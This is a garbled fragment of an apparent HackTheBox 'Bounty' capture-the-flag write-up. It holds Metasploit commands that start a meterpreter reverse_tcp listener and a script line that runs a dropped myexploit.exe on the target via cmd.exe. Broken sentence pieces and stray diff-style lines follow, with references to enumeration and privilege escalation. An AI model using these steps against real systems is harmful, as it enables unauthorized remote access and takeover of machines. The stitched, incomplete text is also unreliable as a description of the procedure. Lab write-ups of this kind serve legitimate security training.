Bounty WriteupHow to resolve HTB Bounty

 host$ msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST ip.ip.ip.ip msf exploit(multi/handler) > set LPORT port msf exploit(multi/handler) > run

-we need to run our exploit on the server
+it, we need to run our exploit on the server with the same

 Set cmd1 = wShell1.Exec("cmd.exe /c C:\Windows\Temp\myexploit.exe")

 meterpreter we can start to enumerate the server.

 And, we see that the server has an

 run) but now with

 Then, when we have another session opened, we are going to run the next one:

 Here we got some exploits that we can use to elevate to